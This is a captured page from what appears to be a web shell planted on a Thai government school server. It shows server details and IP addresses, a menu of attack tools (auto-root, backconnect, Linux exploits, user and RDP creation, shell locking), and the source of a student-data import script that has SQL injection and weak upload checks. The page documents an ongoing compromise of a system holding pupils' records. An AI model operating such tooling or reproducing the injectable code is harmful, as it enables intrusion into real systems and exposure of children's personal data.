Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
amss /
modules /
student_main /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
install
[ DIR ]
drwxr-xr-x
manual
[ DIR ]
drwxr-xr-x
picture
[ DIR ]
drwxrwxrwx
upload
[ DIR ]
drwxrwxrwx
default.php
248
B
-rwxr-xr-x
ed_year.php
10.65
KB
-rwxr-xr-x
export_test.php
930
B
-rw-r--r--
export_to_excel.php
3.08
KB
-rwxr-xr-x
export_to_excel2.php
3.03
KB
-rwxr-xr-x
getxml_student.php
14.36
KB
-rw-r--r--
getxml_student.phpOLD
11.7
KB
-rwxr-xr-x
getxml_student2.php
9.39
KB
-rw-r--r--
index.php
258
B
-rwxr-xr-x
livesearch.php
625
B
-rwxr-xr-x
livesearch_2.php
640
B
-rwxr-xr-x
livesearch_3.php
629
B
-rwxr-xr-x
livesearch_mobile.php
630
B
-rwxr-xr-x
menu.php
5.64
KB
-rwxr-xr-x
menu_mobile.php
932
B
-rwxr-xr-x
permission.php
8.45
KB
-rwxr-xr-x
permission_sch.php
8.83
KB
-rwxr-xr-x
permission_sch_khet.php
13.49
KB
-rwxr-xr-x
return_permission_sch_khet.php
779
B
-rwxr-xr-x
student_getxml.php
2.51
KB
-rwxr-xr-x
student_getxml2.php
3.1
KB
-rwxr-xr-x
student_import.php
6.72
KB
-rwxr-xr-x
student_import2.php
8.26
KB
-rw-r--r--
student_import3.php
4.35
KB
-rw-r--r--
student_import_2.php
6.67
KB
-rw-r--r--
student_importx.php
6.36
KB
-rwxr-xr-x
student_khet_update.php
34.99
KB
-rwxr-xr-x
student_num.php
10.17
KB
-rw-r--r--
student_report1.php
14.48
KB
-rwxr-xr-x
student_report1_mobile.php
12.93
KB
-rwxr-xr-x
student_report2.php
9.46
KB
-rwxr-xr-x
student_report3.php
7.82
KB
-rwxr-xr-x
student_report4.php
10.73
KB
-rw-r--r--
student_report5.php
9.17
KB
-rw-r--r--
student_sch_update.php
25.93
KB
-rwxr-xr-x
student_tranfer.php
4.2
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : student_import3.php
<?php /** ensure this file is being included by a parent file */ defined( '_VALID_' ) or die( 'Direct Access to this location is not allowed.' ); //ปีการศึกษา $sql = "select * from student_main_edyear where year_active='1' order by ed_year desc limit 1"; $dbquery = mysqli_query($connect,$sql); $year_active_result = mysqli_fetch_array($dbquery); if($year_active_result['ed_year']==""){ echo "<br />"; echo "<div align='center'>ยังไม่ได้กำหนดทำงานในปีการศึกษาใด ๆ กรุณาไปที่เมนูตั้งค่าระบบ เพื่อกำหนดปีการศึกษา</div>"; exit(); } if($_FILES){ if($_FILES['userfile']['name']==""){ ?> <script> alert("กรุณาเลือกไฟล์ด้วย ค่ะ"); document.location.href="?option=student_main&task=student_import"; </script> <?php exit(); } // ตรวจสอบว่าเป็น text file หรือไม่ $uploaddir ="modules/student_main/upload/"; //ที่เก็บไฟล์ $uploadfile = $uploaddir.basename($_FILES['userfile']['name']); $basename = basename($_FILES['userfile']['name']); //ลบไฟล์เดิม if(file_exists($uploadfile)){ unlink($uploadfile); } $file_name = explode(".", $_FILES['userfile']['name']); //ตรวจสอบนามสกุล if($file_name[1]!="txt"){ unlink($_FILES['userfile']['tmp_name']); ?> <script> alert("ไม่ใช่ ไฟล์ประเภท Text กรุณาอ่านคำอธิบายอีกครั้ง"); document.location.href="?option=student_main&task=student_import"; </script> <?php exit(); } if (move_uploaded_file($_FILES['userfile']['tmp_name'],$uploadfile)){ $data=file("$uploadfile"); for($i=1;$i<count($data);$i++){ list($objArr[0],$objArr[1],$objArr[2],$objArr[3],$objArr[4],$objArr[5],$objArr[6],$objArr[7],$objArr[8],$objArr[9],$objArr[10]) = explode("\t",$data[$i]); $school_code=$objArr[1]; $name=$objArr[3]; $surname=$objArr[4]; if($i>0){ $on_site=0; $sql_find = "select person_id from student_main_main where name like '$name' and surname like '$surname' and ed_year='$year_active_result[ed_year]' "; $dbquery_find = mysqli_query($connect,$sql_find); $result = mysqli_fetch_array($dbquery_find); $person_id=$result['person_id']; $num_row=mysqli_num_rows($dbquery_find); if($num_row>=1){ if(($objArr[9] or $objArr[10]) ==1){ $on_site=1; } $sql = "insert into student_main_distant (school_code,person_id,on_air,on_hand,on_demand,on_line,on_site,no_equipment,no_parent"; $sql .=")"; $sql .=" values ('$objArr[1]','$person_id','$objArr[5]','$objArr[6]','$objArr[7]','$objArr[8]','$on_site','$objArr[9]','$objArr[10]' "; $sql .=")"; $dbquery = mysqli_query($connect,$sql); } } } } else{ echo "<br><strong><font color=#990000 size=3>ไม่สามารถอัพโหลดได้</font></strong>"; exit(); } ?> <script> //document.location.href="?option=student_main&task=student_khet_update"; </script> <?php } else{ uploadfile(); } //ส่วนของform function uploadfile () { echo "<form name ='frm1' Enctype = 'multipart/form-data'>"; echo "<br>"; echo "<table align='center' width='50%' border='0'>"; echo "<tr>"; echo "<td align='right'><strong><font color='#003366' size='2'>ไฟล์เอกสาร</font></strong></td>"; echo "<td align='left'><input name = 'userfile' type = 'file'><font color='#003366' size='2'></font></td>"; echo "</tr>"; echo "<tr><td></td><td></td></tr> "; echo "<tr> "; echo "<td></td><td align = 'left'><INPUT TYPE='button' name='smb' value='ตกลง' onclick='upload(1)'></td>"; echo "</tr>"; echo "</table>"; echo "</form>"; echo "<br /><br /><br />"; echo "<table width=70% border=0 align=center>"; echo "<Tr><Td align='left'><strong>คำอธิบาย</strong></Td></Tr>"; echo "</Table>"; } ?> <script> function upload(val){ if(val==1){ callfrm("?option=student_main&task=student_import3"); } } </script>
Close
